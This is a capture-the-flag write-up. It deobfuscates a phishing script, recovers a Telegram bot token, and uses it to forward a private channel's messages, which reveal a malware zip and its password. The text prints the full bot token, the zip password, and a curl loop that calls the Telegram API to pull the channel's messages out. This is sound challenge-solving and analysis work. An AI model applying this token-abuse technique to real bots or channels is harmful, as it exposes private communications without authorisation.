You can already see that the first string might be the cipher, the second the key and the third the IV.
Cypher
Initialization Vector
Using these strings to decrypt the blob was successful in CyberChef.
Decrypted Blob
I cleaned up the start of the original script to start deobfuscating that before inserting the decrypted part.
Beautified Script Start
I suspected that the function _$_9b39 just generates the input for the function that is inside the AES stream. Duplciate semicholi can be removed as they have no function.
I wrote a test script that outputs the result for the indices 0-5 (of the array that is returned by _$_9b39).
Deobfuscation Results
Given these strings, I replaced the entire CryptoJS cipher part with the decrypted version from Cyberchef. I also beautified it. It contains further of these functions that can easily be replaced.
Function Outputs to Replace
Again, I wrote a test script for each of these functions to make it obsolete:
Function Test Script
Function Test Script Results
"outputgen[12] = log" is never used, but I replaced the other occurrences and removed the function.
And another one, this time with more automation:
Next Test Script
The results were promising:
Script Results
"outgen[21] = log" is again never used.
This function was the last one that looked quite obfuscated. Unraveling it was simple with a test script again.
Test Script
0p3r4t10n_4PT_Un10n was the resulting string. This however was not the flag. I moved on to potentially see the Telegram Chat that the messages are sent to.
Now this function is interesting. It takes a secret key (which is later defined as the part of the mail before the @ sign, that you type in at the website.)
Remaining Dubious Function
Understanding the decryption function, the cipher and key could be used to get the result:
Decryption Result
This turned out to contain a Telegram API key 7767830636:AAF5Fej3DZ44ZZQbMrkn8gf7dQdYb3eNxbc
Exploring the Telegram API
The value of descriptionField is converted to an integer with a base of 10 and that is parsed to the function as second input. input2 is then used as the chat_id in the telegram link. The final link will look like this, given that input2 is 10. However, since this is the content of the description field, taken as decimal, we do not know it. We have the API key though, so we might be able to query the Telegram API and list all chats. You can retrieve information from the Telegram API, using the getUpdates endpoint:
This is the chatID of the "Operation Eldoria" channel: -1002496072246
This is the forward origin of the invite: -1002496072246
The bot we have the key of, bot7767830636, is called OperationEldoriaBot. This invite link can be found, but seems invalid: https://t.me/+_eYUKZwn-p45OGNk
Invalid Invite Link
Requesting the Operation Eldoria Chat is not possible due to missing access rights.
No Direct Access To Telegram Chat
After testing and research, we found out that you can join the Telegram bot and use this to forward messages to your Chat ID! We could forward the messages of the OperationEldoria chat to our private devices, even though we could not join the chat directly.
Telegram Bot Access
I wrote this script to forward the first 15 messages to my telegram chat:
Forwarded Telegram Messages
We retrieved a zip file and a password for it dr4g0nsh34rtb3l0ngst0m4l4k4r
Malware Analysis
The zip file could be downloaded and extracted with the password. The content was "Brave.exe".
From this I suspect that the program is a modified version of the Brave browser, since it seems too large for just a hacking tool.
Opening the file in avalonilspy did not work. I started a Windows VM to get more possibilities for Windows-native analysis. Submitting the file to Virustotal shew that it was known and detected as malware.
VirusTotal Malware Detection
Unfortunately, we thought that the malware would be a dead end, since it was known to VirusTotal and in the analysis results was nothing interesting. We moved on with querying the Telegram API. It was possible to list the administrators of the OperationEldoria group and get some more information on other users, but that did not help us.
I even wanted to try dynamic analysis in the Windows VM, but Windows, of course, decided to prevent its network connection from working.
After the CTF, I saw that you just had to do some dynamic analysis and investigate the requests that the malware does in Wireshark.
for i in {1..15}; do curl 'https://api.telegram.org/bot7767830636:AAF5Fej3DZ44ZZQbMrkn8gf7dQdYb3eNxbc/forwardMessage?chat_id=<redacted>&from_chat_id=-1002496072246&message_id='$i | jq >> messages.txt; done
strings Brave.exe | wc -l
34667
file Brave.exe
Brave.exe: PE32+ executable for MS Windows 6.00 (console), x86-64, 8 sections
